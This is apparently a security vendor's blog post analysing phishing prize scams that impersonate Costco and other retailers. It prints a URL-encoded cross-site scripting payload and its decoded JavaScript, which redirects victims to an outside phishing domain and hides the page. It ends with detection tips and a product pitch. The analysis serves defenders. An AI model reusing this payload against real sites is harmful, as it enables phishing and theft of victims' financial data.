If you’ve ever bought a raffle ticket, purchased a lottery ticket, or called into a radio station for concert tickets, you’ve pictured yourself on the winning side of a prize. It’s a nice feeling. Whether you chalk it up to serotonin, dopamine, or human nature, winning makes us feel good.

Cybercriminals like to win too. Perhaps that’s why they have been devising prize-winning schemes for years. In fact, according to the FBI, in 2023 victims fell prey to more than $9.5 million worth of fake prize- winning schemes.¹ However, the new phishing threat INKY caught plays by its own set of rules and could be a real game-changer for those hoping to disguise malicious links.

Malicious Re-Direct Scripts Leverage Cross-Site Scripting

INKY has discovered an increase in phishing emails using malicious redirect scripts in URL-encoded links.

A Word About URL Encoding: URL encoding converts characters into a format that can be transmitted over the Internet. This encoding replaces unsafe ASCII characters with a "%" followed by two hexadecimal digits. Spaces are replaced by "+", and special characters like "<", ">", "/", and others are replaced by their respective hexadecimal codes. Then, to the delight of cybercriminals everywhere, web browsers will automatically decode the obfuscated strings back into ASCII.

For now, this technique has only appeared in prize scams that impersonate reputable brands like Costco, YETI, Harbor Freight Tools, and Lowes. Let’s take a closer look at a Costco phishing email example.

The message below appears to be a notice of an expired membership. However, read a little more closely and you’ll see the email offers to extend your membership for free!

When clicking on “Extend for Free” the recipient opens a page on a malicious site impersonating Costco. From there, clicking on “Extend Now” brings you to a harvesting form that collects personal and financial information.

A Closer Look at the Encoded URL

To better understand the complexities behind this phishing email, we need to take a closer look at the encoded URL. With this technique, phishers use domains like scoperac[.]com as a redirect and mostly everything after the query parameter ( “q=”) is URL-encoded.

A more magnified view looks like this:

8%22%3E%3C%2Fdiv%3E%3C%2F%64%69%76%3E%3Cscript%3Ewindow%5B%27location%27%5D%5B%27replace%
27%5D%28%5B%27h%27%2C%20%27t%27%2C%20%27t%27%2C%20%27p%27%2C%20%27s%27%2C%20%27%3A
%27%2C%20%27%2F%27%2C%20%27%2F%27%2C%20%27i%27%2C%20%27m%27%2C%20%27p%27%2C%20%27u
%27%2C%20%27t%27%2C%20%27e%27%2C%20%27l%27%2C%20%27e%27%2C%20%27t%27%2C%20%27t%27%2C
%20%27e%27%2C%20%27r%27%2C%20%27.%27%2C%20%27c%27%2C%20%27o%27%2C%20%27m%27%2C%20%2
7%2F%27%2C%20%270%27%2C%20%27%2F%27%2C%20%270%27%2C%20%27%2F%27%2C%20%270%27%2C%20
%27%2F%27%2C%20%27b%27%2C%20%27f%27%2C%20%273%27%2C%20%27c%27%2C%20%274%27%2C%20%27
c%27%2C%20%276%27%2C%20%27a%27%2C%20%273%27%2C%20%270%27%2C%20%27b%27%2C%20%27c%27%
2C%20%27d%27%2C%20%276%27%2C%20%271%27%2C%20%278%27%2C%20%273%27%2C%20%275%27%2C%20
%272%27%2C%20%272%27%2C%20%271%27%2C%20%271%27%2C%20%27c%27%2C%20%273%27%2C%20%271
%27%2C%20%278%27%2C%20%278%27%2C%20%27d%27%2C%20%27d%27%2C%20%27f%27%2C%20%277%27%2
C%20%276%27%2C%20%27/13/280-11539/961-367248-
14403%27%5D%5B%27join%27%5D%28%27%27%29%29%2Cdocument%5B%27body%27%5D%5B%27style%27%5D%
5B%27opacity%27%5D%3D0x0%3B%3C%2Fscript%3E

The decoding string is:

8"> </div></div><script>window['location']['replace'](['h', 't', 't', 'p', 's', ':', '/', '/', 'i', 'm', 'p', 'u', 't', 'e', 'l', 'e', 't', 't', 'e', 'r', '.', 'c', 'o', 'm', '/', '0', '/', '0', '/', '0', '/', 'b', 'f', '3', 'c', '4', 'c', '6', 'a', '3', '0', 'b', 'c', 'd', '6', '1', '8', '3', '5', '2', '2', '1', '1', 'c', '3', '1', '8', '8', 'd', 'd', 'f', '7', '6', '/', '13', '/280-11539/961-367248-14403']['join']('')), document['body']['style']['opacity'] = 0x0;</script>

What INKY found is that it is JavaScript code that attempts to inject a script into a web page to redirect the browser to a new location. It does so by constructing a URL from an array of characters and joining them together. You’ll notice each character of a URL is separated into its own part and then each part is separated by a comma. The letters actually spell out the URL address, which is exactly how the browser will put together the link.

In this case, the final URL is:

https://imputeletter.com/0/0/0/bf3c4c6a30bcd618352211c3188ddf76/13/280-11539/961-367248-14403

Additionally, the script sets the opacity of the body to 0x0, which is an attempt to hide the contents of the page (setting opacity to 0). By hiding the webpage content, attackers can perform other malicious activities in the background, such as logging keystrokes, stealing cookies, or executing further commands without the user’s awareness.

A Great Example of Cross-Site Scripting

In this particular phishing campaign, the script embedded within the URL-encoded string is an example of a cross-site scripting (XSS) attack. If you have not come across cross-site scripting before, the attacker manipulates the webpage's content and visibility. The victim clicks on a link from the phisher and the browser opens a legitimate website, but it also executes malicious script. The malicious script is what captures the user’s banking information or credentials and delivers them to the attacker.

Due to the large number of similar phish, it’s likely that this cross-site scripting / URL-encoding scheme is a phishing kit available for sale to scammers looking for a new technique. Below are a few more examples of cross-site scripting prize scams.

Example #1: Marriott Phishing Email

Example #2: Harbor Freight Phishing Email

Example #3: Lowes Phishing Email

Example #4: Tractor Supply Co. Phishing Email Sequence

How to Spot a Phishing Prize Scam

According to the Federal Trade Commission, there are three primary signs of a prize scam.²

1. You’re asked to pay something to get your prize.
2. The email says paying something increases your odds of winning.
3. You’re asked to provide financial information. 

Recap of Techniques

• URL-encoded links: these attempt to evade security scans by concealing the destination URL.
• Cross-site scripting (XSS): the manipulation of a webpage's content and visibility.
• Brand impersonation: uses elements of a well-known brand to make an email look as if it came from that company.
• Data harvesting: collecting personal data under false pretenses.

Best Practices: Guidance and Recommendations

• Carefully inspect the sender’s email address. These emails claim to be from reputable brands like Costco but none of the domains were associated with any reputable brands. Recipients should contact these companies with a communication method other than email if they are unsure about the sender.
• Carefully inspect the domain in the web browser. None of these domains were associated with any of the reputable brands impersonated.
• These encoded-URLs were constructed to exploit a vulnerability in a domain’s server-side script if it does not properly sanitize the input received via URL parameters. Web page owners should ensure that inputs like these are properly sanitized to prevent XSS attacks, so that any HTML or script code included in user inputs is either escaped or handled in a way that it cannot be executed.

Year after year, phishing threats become more complex and harder to detect. There are, of course, solutions available. INKY provides the most comprehensive malware and email phishing protection available. It scans every sent and delivered email automatically and flags malicious emails, protecting your organization and your clients from even the most complex threats – even cross-site scripting. INKY’s intelligent machine learning algorithms identify abnormalities in emails, even if the threat has never been seen before. INKY’s Email Assistant then warns employees of threats, while protecting and training them at the same time. Rest assured, as busy as your organization is, INKY installation is simple. Most customers are up and running in under an hour – even with remote employees. Schedule a demo or inquire today.

----------------------

INKY is an award-winning, behavioral email security platform that blocks phishing threats, prevents data leaks, and coaches users to make smart decisions. Like a cybersecurity coach, INKY signals suspicious behaviors with interactive email banners that guide users to take safe action on any device or email client. IT teams don’t face the burden of filtering every email themselves or maintaining multiple systems. Through powerful technology and intuitive user engagement, INKY keeps phishers out for good. Learn why so many companies trust the security of their email to INKY. Request an online demonstration today.

¹Source: https://www.ic3.gov/Media/PDF/AnnualReport/2023_IC3Report.pdf

²Source: https://consumer.ftc.gov/articles/fake-prize-sweepstakes-and-lottery-scams